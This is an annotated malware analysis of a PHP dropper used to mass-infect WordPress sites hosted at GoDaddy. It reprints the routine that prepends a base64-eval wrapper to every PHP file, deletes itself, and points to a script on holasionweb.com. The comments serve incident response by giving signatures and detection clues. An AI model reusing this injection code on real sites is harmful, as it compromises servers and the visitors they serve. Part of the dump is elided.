Description: Code used to inject a malicious JavaScript into many
WordPress sites hosted at GoDaddy.
Malware dump:
Decoded dump:
// Analysis note: lifts PHP's execution time limit for this request, so the
// directory walk further down is not cut short by max_execution_time.
set_time_limit(0);
// Analysis note (sample kept verbatim): rewrites the file $f so that the
// string $inj sits in front of its previous contents.
//
// What a responder can take from this routine:
//  - An infected file starts with the marker tested in the third check below,
//    "<?php /**/ eval(base64_decode(" -- a reliable first-bytes signature when
//    sweeping a web root.
//  - The file is reopened in "w" mode, so its modification time changes; the
//    cluster of mtimes across *.php files dates the run.
//  - Every filesystem call is prefixed with @ and no return value is checked,
//    so PHP error logs will show nothing for files that could not be written.
//
// $f   : path of the file to rewrite.
// $inj : text to place at the start of the file.
function inject($f,$inj){
// Counter shared with the top-level script, which prints it when the walk ends.
global $totalinjected;
$c = file_get_contents($f);
// Skip files containing "r57shell" (the name of a well-known PHP web shell).
// NOTE(review): presumably to leave other backdoors on the host untouched -- the dump does not say why.
if (strstr($c,"r57shell")) return;
// Skip files containing "@zend". NOTE(review): looks like a guard for Zend-encoded files -- confirm.
if (strstr($c,"@zend")) return;
// Skip files that already carry this injector's own wrapper (same prefix the
// top-level script builds into $encoded), so a file is not infected twice.
if (strstr($c,'<?php /**/ eval(base64_decode(')) return;
// A file that begins with the 10-byte marker "<?php /**/" but did not match the
// check above has its leading block dropped: everything up to and including the
// first PHP closing tag is cut off before the new payload is prepended.
// NOTE(review): this looks like replacement of an older or differently encoded
// variant of the same injection -- inferred from the shared marker, not stated on the page.
if (substr($c,0,10)=='<?php /**/'){
$k=strpos($c,'?>')+2;
$c=substr($c,$k);
}
$c = $inj.$c;
// Overwrite in place with errors suppressed; the result of fopen/fwrite is never tested.
$h2 = @fopen ($f, "w");@fwrite($h2, $c);@fclose($h2);
// Incremented whether or not the write succeeded, so the reported total is an
// upper bound on the number of files actually modified.
$totalinjected++;
}
// Analysis note (sample kept verbatim): walks $dir recursively and passes every
// regular file whose last dot-separated segment is "php" (case-insensitive) to
// inject(), together with the payload held in the global $encoded.
//
// Scope for incident response: the walk covers the starting directory and all
// of its subdirectories, so every *.php file beneath that point has to be
// checked, not only WordPress core or theme files.
//
// $dir : directory to walk.
function inject_in_folder($dir){
// Payload wrapper assembled by the top-level script.
global $encoded;
if (is_dir($dir)) {
// Directory handle errors are suppressed; an unreadable directory is skipped silently.
if ($dh = @opendir($dir)) {
while (($file = @readdir($dh)) !== false) {
// Ignore the self and parent entries so the recursion cannot loop on them.
if (($file==".")||($file==".."))continue;
$k=$dir."/".$file;
if (is_dir($k)){
inject_in_folder($k);
}else{
if (is_file($k)){
// Extension test: the text after the last "." in the full path, lower-cased.
$ext=explode(".",$k);
$c=count($ext)-1;
if (strtolower($ext[$c])=="php"){
// NOTE(review): the trailing "n" is probably "\n" with the backslash lost when
// the dump was published; take that into account when matching infected files byte for byte.
inject($k,$encoded."n");
}
}
}
}
@closedir($dh);
}
}
}
// Analysis note (sample kept verbatim): driver of the dropper. It deletes its own
// file, builds the payload wrapper, then runs the recursive walk from its own directory.
//
// Path of the script being executed, i.e. this dropper.
$z=$_SERVER["SCRIPT_FILENAME"];
// Self-deletion before any other work: the dropper is normally absent from disk
// after the run, so web-server access logs (the request that executed it) are
// the place to look for it, not the file system.
@unlink($z);
// Base64 form of the script tag that ends up in served pages. The host in it,
// holasionweb.com, is the network indicator given on this page.
// $cod is not referenced again in the lines shown here.
$cod=base64_encode('<script src="http://holasionweb.com/oo.php"></script>');
// The published dump elides lines at this point (printed as ".."). $to_pack is
// first assigned somewhere in the elided part; how it is derived from $cod is not visible.
..
$to_pack=base64_encode($to_pack);
// Final wrapper written to victim files: a PHP block that base64-decodes and
// eval()s the packed code. Its fixed prefix is the on-disk signature of this campaign.
$encoded='<?php /**/ eval(base64_decode("'.$to_pack.'"));?>';
// The walk starts at the directory the dropper was placed in.
$val=dirname($z);
$totalinjected=0;
// NOTE(review): "$valn" here and "secondsn" below are probably "$val\n" and
// "seconds\n" with the backslash lost in the published dump -- confirm against the original sample.
echo "Working with $valn";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
// The summary is written to the HTTP response, so whoever requested the dropper
// receives the file count and the elapsed time.
echo "|Injected| $totalinjected files in $end_time secondsn";